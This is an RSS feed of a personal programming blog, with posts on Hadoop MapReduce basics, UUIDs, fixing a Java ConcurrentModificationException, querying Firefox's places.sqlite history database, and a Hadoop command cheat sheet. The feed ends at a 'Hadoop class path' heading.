<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>random() &#187; programming</title>
	<atom:link href="http://blog.maxgarfinkel.com/archives/category/programming/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.maxgarfinkel.com</link>
	<description>All sorts, who knows?</description>
	<lastBuildDate>Thu, 19 Aug 2010 20:07:00 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>uuid</title>
		<link>http://blog.maxgarfinkel.com/archives/196</link>
		<comments>http://blog.maxgarfinkel.com/archives/196#comments</comments>
		<pubDate>Tue, 18 May 2010 22:40:41 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Hadoop]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/archives/196</guid>
		<description><![CDATA[I needed to create unique ids for URLs I was processing in a map reduce job and, due to ignorance, I just dumped the output to the local file system and then ran a single-threaded job over the list to produce ids. It turns out I could have used a UUID (universally unique identifier). The only [...]]]></description>
			<content:encoded><![CDATA[<p>I needed to create unique ids for URLs I was processing in a map reduce job and, due to ignorance, I just dumped the output to the local file system and then ran a single-threaded job over the list to produce ids. It turns out I could have used a UUID (universally unique identifier). The only advantage of my approach is that the ids are short. <a href="http://java.sun.com/javase/6/docs/api/java/util/UUID.html">UUID docs</a></p>
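<p>As a rough illustration of the UUID route, here is a minimal sketch using java.util.UUID. The class name UrlIds and the sample URL are made up for the example. nameUUIDFromBytes derives a repeatable (version 3) id from the URL's bytes, while randomUUID gives a fresh random (version 4) id on each call.</p>

```java
import java.nio.charset.StandardCharsets;
import java.util.UUID;

// Hypothetical helper, not part of the original job.
final class UrlIds {

    // Same URL in, same UUID out, so every mapper can compute the id
    // independently without a central counter.
    static UUID idFor(String url) {
        return UUID.nameUUIDFromBytes(url.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) {
        String url = "http://example.com/some/page"; // made-up sample URL
        System.out.println(idFor(url));         // stable across runs and machines
        System.out.println(UUID.randomUUID());  // different on every call
    }
}
```

<p>The trade-off still holds: written out as text, each of these ids is 36 characters long.</p>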
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/196/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Learning Hadoop</title>
		<link>http://blog.maxgarfinkel.com/archives/176</link>
		<comments>http://blog.maxgarfinkel.com/archives/176#comments</comments>
		<pubDate>Fri, 26 Feb 2010 20:34:32 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Hadoop]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=176</guid>
		<description><![CDATA[I have been trying to get my head round Hadoop, specifically Map-Reduce. I set everything up a while ago and had already started forgetting important things so this is an attempt to get down all the things I learned today before I forget them, in no particular order. Writing a map reduce program When I [...]]]></description>
			<content:encoded><![CDATA[<p>I have been trying to get my head round Hadoop, specifically Map-Reduce. I set everything up a while ago and had already started forgetting important things so this is an attempt to get down all the things I learned today before I forget them, in no particular order.</p>
<h2>Writing a map reduce program</h2>
<p>When I installed Hadoop barely a month ago it was at version 0.20.1; as of writing this, the stable release is 0.20.2.</p>
<p>Unfortunately the <a title="the official hadoop tutorial" href="http://hadoop.apache.org/common/docs/current/mapred_tutorial.html#Example%3A+WordCount+v1.0" target="_blank">official Hadoop tutorial</a> at Apache is already out of date and shows the use of deprecated calls. Thankfully <a title="word count tutorial for hadoop 0.20.1" href="http://cxwangyi.blogspot.com/2009/12/wordcount-tutorial-for-hadoop-0201.html" target="_blank">Yi Wang has updated it</a> for 0.20.1.</p>
<h3>Overview of a map reduce program</h3>
<p>In both Yi&#8217;s and the Apache tutorial the entire map reduce program is contained within a single outer class. Within this there are two inner classes, one handling the map stage and one handling the reduce stage. The outer class also has a main method, which seems to contain all the job configuration options. These seem to be:</p>
<div id="_mcePaste">
<ul>
<li>job.setJarByClass(UrlCollector.class);</li>
<li>job.setMapperClass(Map.class);</li>
<li>job.setReducerClass(Reducer.class);</li>
<li>job.setOutputKeyClass(Text.class);</li>
<li>job.setOutputValueClass(IntWritable.class);</li>
</ul>
</div>
<h4>The Mapper</h4>
<p>In these examples the mapper class is a public static inner class which extends Hadoop&#8217;s core Mapper class, org.apache.hadoop.mapreduce.Mapper. This class is generic, so you pass it some type information in the class declaration:</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">static</span> <span style="color: #000000; font-weight: bold;">class</span> <span style="color: #003399;">Map</span> <span style="color: #000000; font-weight: bold;">extends</span> Mapper <span style="color: #339933;">&lt;</span>Object, Text, Text, IntWritable<span style="color: #339933;">&gt;</span><span style="color: #009900;">&#123;</span></pre></div></div>

<p>According to the javadoc the type parameters are: the input keys type, the input values type, the output keys type and the output values type.</p>
<p>The mapper class (Map) doesn&#8217;t have a constructor but simply overrides the Mapper method map</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;">@Override
<span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000066; font-weight: bold;">void</span> map<span style="color: #009900;">&#40;</span><span style="color: #003399;">Object</span> key, Text value, <span style="color: #003399;">Context</span> context<span style="color: #009900;">&#41;</span>
        <span style="color: #000000; font-weight: bold;">throws</span> <span style="color: #003399;">IOException</span>, <span style="color: #003399;">InterruptedException</span> <span style="color: #009900;">&#123;</span></pre></div></div>

<p>The Map.map() method takes a key and a value typed to match the first two parameters of Mapper&lt;ik,iv,ok,ov&gt;. It also takes an argument of type Context. The Context type is an inner class of Mapper and it seems to be where you pass back output key-values for passing on to the reduce stage. In this example we are contracted to emit a Text key and an IntWritable value, so the end section of the map method would roughly look like this:</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;">Text t <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Text<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
t.<span style="color: #006633;">set</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;some-text-based-key&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
IntWritable i <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> IntWritable<span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
context.<span style="color: #006633;">write</span><span style="color: #009900;">&#40;</span>t, i<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>So to summarise: the mapper class extends Mapper and implements its own map method. The map method takes a key and a value as well as a context. You process your keys and values in whatever way your mapping phase requires and output the intermediate keys and values via the context object using the write(k,v) method.</p>
<h4>The Reducer</h4>
<p>Much the same as the mapper, the reducer is a public static inner class and it extends Reducer&lt;<em>keyin, valuein, keyout, valueout</em>&gt;. As you can see Reducer has its types parameterized too. The reducer class (our one) overrides Reducer.reduce(<em>Object, Iterable, Context</em>). Before attempting to explain any further I want to quickly backtrack to what will happen when this is run.</p>
<p>First up, of course, the mapper is called, does all its funky mapping and spits out a bunch of keys and values. Once all of the mappers have finished and their output is sorted on the key, the reduce phase gets to start. The framework then starts moving the mappers&#8217; output over to the reducers. This entails collecting up all the keys that are the same across the whole cluster and merge sorting them into a file for the reducer to ingest.</p>
<p><img class="alignnone size-full wp-image-180" title="Map Reduce Diagram" src="http://blog.maxgarfinkel.com/wp-uploads/2010/02/mapreduceDIagram.png" alt="A Map Reduce Diagram" width="500" height="330" /></p>
<p>In this example we have 3 possible key values <em>a, b </em>and <em>c</em>. After each mapper has run, all the values keyed on <em>a </em>get copied to the green intermediary file. They are also sorted during this process, so the green intermediary file ends up with all the <em>a </em>values in order. The same happens for the <em>b</em> values, which end up in the red file, and the <em>c </em>values, which end up in the blue/green file at the bottom. In this case each reducer then just deals with one intermediary file, <em>reducing</em> down, say, all the <em>a </em>values into a final output file. To contextualise it, the word count example would fill the green file with a stack of keys and values that would all be <em>hello 1</em>. The reducer stage would pick up that file and run through it, summing all the values for that key. Thus the output file would contain the key, <em>hello</em>, and the sum of the intermediary values, <em>i.e. </em>the number of occurrences of hello.</p>
<p>Given this brief detour we can now say a little more about the arguments for the reduce method. The first argument is the key, its type being the input key type we specified when extending Reducer&lt;<em>ik, iv, ok, ov</em>&gt;. The next argument is an Iterable over the type we specified for the input values when extending Reducer. If we look back at the detour this should make a little more sense, as what we are getting is a bunch of values that share a key. Thus the arguments to this method give us a key and the bunch of values associated with it. The final argument, as with the mapper, is a context object, and this is what we write our reduced key-value pairs back to, to produce the final output.</p>
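<p>The flow described above can be mimicked in plain Java without a cluster. This is only a sketch of the idea, not Hadoop code: the class WordCountFlow and its method names are invented for illustration, and a TreeMap stands in for the framework's sort-and-group step.</p>

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

// Plain-Java imitation of map -> sort/group -> reduce; no Hadoop involved.
final class WordCountFlow {

    // "Map" stage: emit a (word, 1) pair for every word in a line.
    static List<Map.Entry<String, Integer>> map(String line) {
        List<Map.Entry<String, Integer>> out = new ArrayList<>();
        for (String word : line.trim().split("\\s+")) {
            if (!word.isEmpty()) {
                out.add(Map.entry(word, 1));
            }
        }
        return out;
    }

    // "Shuffle" stage: gather the values for each key, keys kept in sorted order.
    static Map<String, List<Integer>> shuffle(List<Map.Entry<String, Integer>> pairs) {
        Map<String, List<Integer>> grouped = new TreeMap<>();
        for (Map.Entry<String, Integer> pair : pairs) {
            grouped.computeIfAbsent(pair.getKey(), k -> new ArrayList<>()).add(pair.getValue());
        }
        return grouped;
    }

    // "Reduce" stage: one key plus all of its values in, one total out.
    static int reduce(String key, Iterable<Integer> values) {
        int sum = 0;
        for (int v : values) {
            sum += v;
        }
        return sum;
    }

    // Wire the three stages together for a handful of input lines.
    static Map<String, Integer> run(List<String> lines) {
        List<Map.Entry<String, Integer>> intermediate = new ArrayList<>();
        for (String line : lines) {
            intermediate.addAll(map(line));
        }
        Map<String, Integer> totals = new TreeMap<>();
        for (Map.Entry<String, List<Integer>> group : shuffle(intermediate).entrySet()) {
            totals.put(group.getKey(), reduce(group.getKey(), group.getValue()));
        }
        return totals;
    }

    public static void main(String[] args) {
        System.out.println(run(List.of("hello world", "hello hadoop")));
    }
}
```

<p>The reduce method here has the same shape as the real one: a key and an iterable bunch of values that share it. In Hadoop the result would be written to the context instead of returned.</p>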
<h2>Compiling</h2>
<p>So I knocked up this code in <a title="Netbeans" href="http://netbeans.org/" target="_blank">netbeans</a> and hit clean and build, ran through all the steps I&#8217;m about to describe and it simply didn&#8217;t work. I kept getting</p>
<p>Exception in thread&#8230;<br />
Caused by: java.util.zip.ZipException: error in opening zip file<br />
&#8230;</p>
<p>So the only lesson I could draw is that I need to compile it manually to get it to work. Before compiling the .java file I added some variables to my .bashrc file to make some of it a little easier:<br />
<a name="hadoop-bash-vars"></a></p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#hadoop path</span>
<span style="color: #7a0874; font-weight: bold;">export</span> <span style="color: #007800;">HADOOP_HOME</span>=<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>local<span style="color: #000000; font-weight: bold;">/</span>hadoop
<span style="color: #7a0874; font-weight: bold;">export</span> <span style="color: #007800;">HADOOP_VERSION</span>=0.20.1
<span style="color: #7a0874; font-weight: bold;">export</span> <span style="color: #007800;">PATH</span>=<span style="color: #007800;">$PATH</span>:<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>local<span style="color: #000000; font-weight: bold;">/</span>hadoop<span style="color: #000000; font-weight: bold;">/</span>bin</pre></div></div>

<p>Now to compile the .java file for hadoop</p>
<ol>
<li>Copy the .java file over to my hadoop box (not running it locally yet)</li>
<li>In the same folder as .java file create a folder called classes (mkdir classes)</li>
<li>Then call the compiler</li>
</ol>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;">javac <span style="color: #339933;">-</span>classpath $<span style="color: #009900;">&#123;</span>HADOOP_HOME<span style="color: #009900;">&#125;</span><span style="color: #339933;">/</span>hadoop<span style="color: #339933;">-</span>$<span style="color: #009900;">&#123;</span>HADOOP_VERSION<span style="color: #009900;">&#125;</span><span style="color: #339933;">-</span>core.<span style="color: #006633;">jar</span><span style="color: #339933;">:</span>commons<span style="color: #339933;">-</span>cli<span style="color: #339933;">-</span>1.2.<span style="color: #006633;">jar</span> <span style="color: #339933;">-</span>d classes UrlCollector.<span style="color: #006633;">java</span> <span style="color: #339933;">&amp;&amp;</span> jar <span style="color: #339933;">-</span>cvf urlcollector.<span style="color: #006633;">jar</span> <span style="color: #339933;">-</span>C classes<span style="color: #339933;">/</span> .</pre></div></div>

<p>So let&#8217;s dissect this call bit by bit.</p>
<ul>
<li><strong>javac</strong> &#8211; that&#8217;s the Java compiler.</li>
<li><strong>-classpath</strong> &#8211; here we give it a path to the libraries, using some of the variables we configured in the .bashrc file. The variables basically write out the path to the Hadoop core jar file, which on my machine is /usr/local/hadoop/hadoop-0.20.1-core.jar.</li>
<li><strong>:someOtherJar</strong> &#8211; we separate other libraries with a colon, in this case the Apache Commons CLI library, which seems to be a dependency, not sure about that yet though.</li>
<li><strong>-d</strong> <strong>classes</strong> &#8211; says that we are providing a folder for all the class files to go in (remember step two?)</li>
<li><strong>UrlCollector.java</strong> &#8211; that was the name of the java file I needed to compile, the one containing the map and reduce functions as well as the main method.</li>
<li><strong>&amp;&amp; jar -cvf urlcollector.jar -C classes/ .</strong> &#8211; if the compile succeeds, this packages the class files into a jar: <strong>c</strong> creates an archive, <strong>v</strong> prints verbose output, <strong>f</strong> names the output file (<strong>urlcollector.jar</strong>), and <strong>-C classes/ .</strong> changes into the classes folder and adds everything in it. All importantly, DO NOT forget the period (.) at the end. Without that seemingly insignificant little dot it won&#8217;t work.</li>
</ul>
<p>Great so now we have a jar file that should work and we have some input files &#8211; in the case of the word count tutorial this is a couple of files with some words in them!</p>
<h2>Running the job</h2>
<p>So we have all our bits and pieces and we can now get ready to run this job. The first thing to note is that we must copy our input files into the hadoop file system but we leave our jar on the host file system. Now that we have <a href="#hadoop-bash-vars">set the path to the hadoop bin</a> we can call the hadoop command more easily. Let&#8217;s copy up the source files</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">hadoop dfs <span style="color: #660033;">-copyFromLocal</span> <span style="color: #000000; font-weight: bold;">/</span>local<span style="color: #000000; font-weight: bold;">/</span>data <span style="color: #000000; font-weight: bold;">/</span>hadoop<span style="color: #000000; font-weight: bold;">/</span>fs<span style="color: #000000; font-weight: bold;">/</span>location<span style="color: #000000; font-weight: bold;">/</span></pre></div></div>

<p>Now we are ready for the magic, let&#8217;s run the jar</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">hadoop jar urlcollector.jar com.maxgarfinkel.mapReduce.UrlCollector <span style="color: #000000; font-weight: bold;">/</span>user<span style="color: #000000; font-weight: bold;">/</span>hadoop<span style="color: #000000; font-weight: bold;">/</span>urlCol<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000; font-weight: bold;">in</span> <span style="color: #000000; font-weight: bold;">/</span>user<span style="color: #000000; font-weight: bold;">/</span>hadoop<span style="color: #000000; font-weight: bold;">/</span>urlCol<span style="color: #000000; font-weight: bold;">/</span>out</pre></div></div>

<p>Let&#8217;s break this down.</p>
<ul>
<li><strong>hadoop jar </strong>- We call <em>jar</em> which is basically the <em>run this jar</em> command.</li>
<li><strong>urlcollector.jar</strong> &#8211; That&#8217;s the name of the jar I want to run (include the path if it&#8217;s not in your working directory)</li>
<li><strong>com.maxgarfinkel.mapReduce.UrlCollector</strong> &#8211; That was the package name I had my UrlCollector.java class in, followed by the class name.</li>
<li><strong>/user/hadoop/urlCol/in </strong>- that is the hdfs path to the folder containing the input data we copied up in the previous step.</li>
<li><strong>/user/hadoop/urlCol/out</strong> &#8211; this is the hdfs path to the folder where I want the output to be put. I haven&#8217;t created this folder, I will let hadoop take care of that.</li>
</ul>
<p>So this is it written out in a more generic manner</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">hadoop jar local<span style="color: #000000; font-weight: bold;">/</span>path<span style="color: #000000; font-weight: bold;">/</span>to<span style="color: #000000; font-weight: bold;">/</span>jar full.package.and.class.name hdfs<span style="color: #000000; font-weight: bold;">/</span>source<span style="color: #000000; font-weight: bold;">/</span>data<span style="color: #000000; font-weight: bold;">/</span>location hdfs<span style="color: #000000; font-weight: bold;">/</span>output<span style="color: #000000; font-weight: bold;">/</span>location</pre></div></div>

<p>So once our job has run we can pick up our output using the hadoop dfs command copyToLocal.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/176/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ConcurrentModificationException in a single thread</title>
		<link>http://blog.maxgarfinkel.com/archives/163</link>
		<comments>http://blog.maxgarfinkel.com/archives/163#comments</comments>
		<pubDate>Sun, 14 Feb 2010 17:16:54 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[learning Java]]></category>
		<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=163</guid>
		<description><![CDATA[Today I came across a ConcurrentModificationException being thrown when no concurrent work was taking place. I learned (after a bit of hair tearing) that when you are looping over a list and you decide to remove something from it you will get this error. for&#40;Node n : nodes&#41;&#123; //do some stuff nodes.remove&#40;n&#41;;//This will throw the [...]]]></description>
			<content:encoded><![CDATA[<p>Today I came across a ConcurrentModificationException being thrown when no concurrent work was taking place. I learned (after a bit of hair tearing) that when you are looping over a list and you decide to remove something from it you will get this error.</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">for</span><span style="color: #009900;">&#40;</span>Node n <span style="color: #339933;">:</span> nodes<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
    <span style="color: #666666; font-style: italic;">//do some stuff</span>
    nodes.<span style="color: #006633;">remove</span><span style="color: #009900;">&#40;</span>n<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><span style="color: #666666; font-style: italic;">//This will throw the error</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<p>It makes perfect sense if you think about it. You are stepping over a list, and under the hood the for-each loop is driving an iterator that keeps track of its position. When you remove an element from the list directly, all the later elements are shuffled down, so the iterator could miss an element or shoot off the end of the list. Instead of letting that happen it fails fast and throws an exception. However, more importantly than why it happens, how can we stop it happening? Well, we use a list iterator instead and remove through it.</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;">ListIterator<span style="color: #339933;">&lt;</span>Node<span style="color: #339933;">&gt;</span> li <span style="color: #339933;">=</span> nodes.<span style="color: #006633;">listIterator</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">while</span><span style="color: #009900;">&#40;</span>li.<span style="color: #006633;">hasNext</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
    Node n <span style="color: #339933;">=</span> li.<span style="color: #006633;">next</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
    li.<span style="color: #006633;">remove</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//No error if you remove the element through the iterator</span>
<span style="color: #009900;">&#125;</span></pre></div></div>
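<p>For a version that compiles on its own, here is a small sketch with a list of strings standing in for the nodes. The class name SafeRemoval and the sample data are invented for the example. It shows the iterator approach and, as an alternative on Java 8 or later, Collection.removeIf.</p>

```java
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;

// Illustrative only: strings stand in for the Node objects above.
final class SafeRemoval {

    // Remove every element starting with the given prefix, via the iterator.
    static List<String> removeWithIterator(List<String> source, String prefix) {
        List<String> nodes = new ArrayList<>(source);
        Iterator<String> it = nodes.iterator();
        while (it.hasNext()) {
            String n = it.next();
            if (n.startsWith(prefix)) {
                it.remove(); // removes the element last returned by next()
            }
        }
        return nodes;
    }

    // Same result using removeIf, which handles the iteration internally.
    static List<String> removeWithRemoveIf(List<String> source, String prefix) {
        List<String> nodes = new ArrayList<>(source);
        nodes.removeIf(n -> n.startsWith(prefix));
        return nodes;
    }

    public static void main(String[] args) {
        List<String> nodes = List.of("a1", "b1", "a2", "c1");
        System.out.println(removeWithIterator(nodes, "a"));
        System.out.println(removeWithRemoveIf(nodes, "a"));
    }
}
```

<p>Both methods work on a copy, so the caller's list is left alone. Whether that is wanted depends on the situation.</p>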

]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/163/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Firefox places.sqlite</title>
		<link>http://blog.maxgarfinkel.com/archives/151</link>
		<comments>http://blog.maxgarfinkel.com/archives/151#comments</comments>
		<pubDate>Wed, 27 Jan 2010 14:53:45 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Data visualisation]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Web programming]]></category>
		<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=151</guid>
		<description><![CDATA[Firefox stores your web browsing history in a sqlite db. On windows you can find it in:  Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\xyz.default\. On the mac it is in your home folder: Library/Application support/Mozilla/. There is a great addon for firefox called SQLite Manager which allows you to run SQLite queries. Using this you can look at [...]]]></description>
			<content:encoded><![CDATA[<p>Firefox stores your web browsing history in a sqlite db. On windows you can find it in:  <span style="color: #999999;">Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\xyz.default\</span>. On the mac it is in your home folder: <span style="color: #999999;">Library/Application support/Mozilla/</span>.</p>
<p>There is a great addon for Firefox called <a title="SQLite Manager" href="http://code.google.com/p/sqlite-manager/" target="_blank">SQLite Manager</a> which allows you to run SQLite queries. Using this you can look at the places.sqlite file, which contains your web history data. I am particularly interested in looking at the paths I take, and the following query will pull out pairs of referer-&gt;target pages.</p>

<div class="wp_syntax"><div class="code"><pre class="sql" style="font-family:monospace;"><span style="color: #993333; font-weight: bold;">SELECT</span> plc2<span style="color: #66cc66;">.</span>url <span style="color: #993333; font-weight: bold;">AS</span> <span style="color: #ff0000;">'referer'</span><span style="color: #66cc66;">,</span> plc1<span style="color: #66cc66;">.</span>url <span style="color: #993333; font-weight: bold;">AS</span> <span style="color: #ff0000;">'target'</span>
<span style="color: #993333; font-weight: bold;">FROM</span> moz_historyvisits vis<span style="color: #66cc66;">,</span> moz_historyvisits vis2
<span style="color: #993333; font-weight: bold;">INNER</span> <span style="color: #993333; font-weight: bold;">JOIN</span> moz_places plc1
<span style="color: #993333; font-weight: bold;">ON</span> plc1<span style="color: #66cc66;">.</span>id <span style="color: #66cc66;">=</span> vis<span style="color: #66cc66;">.</span>place_id
<span style="color: #993333; font-weight: bold;">INNER</span> <span style="color: #993333; font-weight: bold;">JOIN</span> moz_places plc2
<span style="color: #993333; font-weight: bold;">ON</span> plc2<span style="color: #66cc66;">.</span>id <span style="color: #66cc66;">=</span> vis2<span style="color: #66cc66;">.</span>place_id
<span style="color: #993333; font-weight: bold;">WHERE</span> vis<span style="color: #66cc66;">.</span>from_visit <span style="color: #66cc66;">=</span> vis2<span style="color: #66cc66;">.</span>id</pre></div></div>

<p>There is a wealth of information in this little file. The visit_type column, for example, gives you an indicator of how the URL was reached.</p>
<table>
<tbody>
<tr>
<th>Type</th>
<th>ID</th>
<th>description</th>
</tr>
<tr>
<td>TRANSITION_LINK</td>
<td>1</td>
<td>This transition type means the user followed a link and got a new toplevel window.</td>
</tr>
<tr>
<td>TRANSITION_TYPED</td>
<td>2</td>
<td>This transition type is set when the user typed the URL to get to the page.</td>
</tr>
<tr>
<td>TRANSITION_BOOKMARK</td>
<td>3</td>
<td>This transition type is set when the user followed a bookmark to get to the page.</td>
</tr>
<tr>
<td>TRANSITION_EMBED</td>
<td>4</td>
<td>This transition type is set when some inner content is loaded. This is true of all images on a page, and the contents of the iframe. It is also true of any content in a frame, regardless of whether or not the user clicked something to get there.</td>
</tr>
<tr>
<td>TRANSITION_REDIRECT_PERMANENT</td>
<td>5</td>
<td>This transition type is set when the transition was a permanent redirect.</td>
</tr>
<tr>
<td>TRANSITION_REDIRECT_TEMPORARY</td>
<td>6</td>
<td>This transition type is set when the transition was a temporary redirect.</td>
</tr>
<tr>
<td>TRANSITION_DOWNLOAD</td>
<td>7</td>
<td>This transition type is set when the transition is a download.</td>
</tr>
</tbody>
</table>
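<p>When post-processing query results outside Firefox, the table above can be carried around as an enum. This is just a sketch: the VisitType name and its fromId helper are my own invention, and only the seven values listed above are covered.</p>

```java
import java.util.Optional;

// Hypothetical lookup for the visit_type ids in the table above.
enum VisitType {
    LINK(1),
    TYPED(2),
    BOOKMARK(3),
    EMBED(4),
    REDIRECT_PERMANENT(5),
    REDIRECT_TEMPORARY(6),
    DOWNLOAD(7);

    private final int id;

    VisitType(int id) {
        this.id = id;
    }

    int id() {
        return id;
    }

    // Returns empty for ids not in the table rather than guessing their meaning.
    static Optional<VisitType> fromId(int id) {
        for (VisitType type : values()) {
            if (type.id == id) {
                return Optional.of(type);
            }
        }
        return Optional.empty();
    }

    public static void main(String[] args) {
        System.out.println(fromId(2));
        System.out.println(fromId(42));
    }
}
```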
<p>For more information on this you can view the <a title="Mozilla developer pages web history info" href="https://developer.mozilla.org/en/NsINavHistoryService" target="_blank">Mozilla dev pages</a> and the full <a title="Places api for firefox" href="https://developer.mozilla.org/en/Places" target="_blank">places system</a> within firefox is documented <a title="places api for firefox" href="https://developer.mozilla.org/en/Places" target="_blank">over here. </a></p>
<p>A wealth of further information on this DB is available over at <a title="Firefox places.sqlite information" href="http://www.firefoxforensics.com/research/index.shtml" target="_blank">firefox forensics</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/151/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hadoop cheat sheet</title>
		<link>http://blog.maxgarfinkel.com/archives/142</link>
		<comments>http://blog.maxgarfinkel.com/archives/142#comments</comments>
		<pubDate>Sun, 24 Jan 2010 18:39:25 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Hadoop]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=142</guid>
		<description><![CDATA[Installing and configuring Hadoop Installing Hadoop on Ubuntu linux, an excellent tutorial by Michael  Noll. Installing Hadoop on Mac OS X , I tried this on snow leopard on a power book and it worked fine with the following caveats &#8211; Check it against Michaels tutorial and configure core-site.xml(referred to as hadoop-site.xml), mapred-site.xml, and hdfs-site.xml. [...]]]></description>
			<content:encoded><![CDATA[<h2>Installing and configuring Hadoop</h2>
<ul>
<li><a title="Installing Hadoop on Ubuntu" href="http://www.michael-noll.com/wiki/Running_Hadoop_On_Ubuntu_Linux_(Single-Node_Cluster)" target="_blank">Installing Hadoop on Ubuntu linux</a>, an excellent tutorial by Michael  Noll.</li>
<li><a title="Installing Hadoop on OS X" href="http://wiki.apache.org/hadoop/Running_Hadoop_On_OS_X_10.5_64-bit_%28Single-Node_Cluster%29" target="_blank">Installing Hadoop on Mac OS X</a>. I tried this on snow leopard on a power book and it worked fine with the following caveat &#8211; check it against Michael&#8217;s tutorial and configure core-site.xml (referred to as hadoop-site.xml), mapred-site.xml, and hdfs-site.xml. I forgot the last two and only the data node and secondary name node started &#8211; remember you can use the jps command from the shell to see what java processes are running.</li>
</ul>
<h2>A list of useful hadoop related commands that I keep forgetting</h2>
<ul>
<li>Starting core as hadoop user: $&lt;HADOOP INSTALL DIR&gt;/bin/start-all.sh</li>
<li>Stopping core as hadoop user: $&lt;HADOOP INSTALL DIR&gt;/bin/stop-all.sh</li>
<li>Starting ZooKeeper: $&lt;ZOOKEEPER INSTALL DIR&gt;/bin/zkServer.sh start</li>
<li>Stopping ZooKeeper: $&lt;ZOOKEEPER INSTALL DIR&gt;/bin/zkServer.sh stop</li>
<li>Starting HBase: $&lt;HBASE INSTALL DIR&gt;/bin/start-hbase.sh</li>
<li>Stopping HBase: $&lt;HBASE INSTALL DIR&gt;/bin/stop-hbase.sh</li>
<li>Useful command to see what is running: $<a href="http://java.sun.com/j2se/1.5.0/docs/tooldocs/share/jps.html" target="_blank">jps</a></li>
<li>(Re)format HDFS: &lt;HADOOP INSTALL DIR&gt;/bin/hadoop namenode -format</li>
</ul>
<h2>Important paths</h2>
<ul>
<li>Hadoop install path: /usr/local/hadoop</li>
<li><a title="Hadoop web ui Job Tracker" href="http://localhost:50030/" target="_blank">web UI for MapReduce job tracker(s)</a></li>
<li><a href="http://localhost:50060/" target="_blank">web UI for task tracker(s)</a></li>
<li><a href="http://localhost:50070/" target="_blank">Web UI HDFS Name Node</a></li>
</ul>
<h2>Hadoop class path</h2>
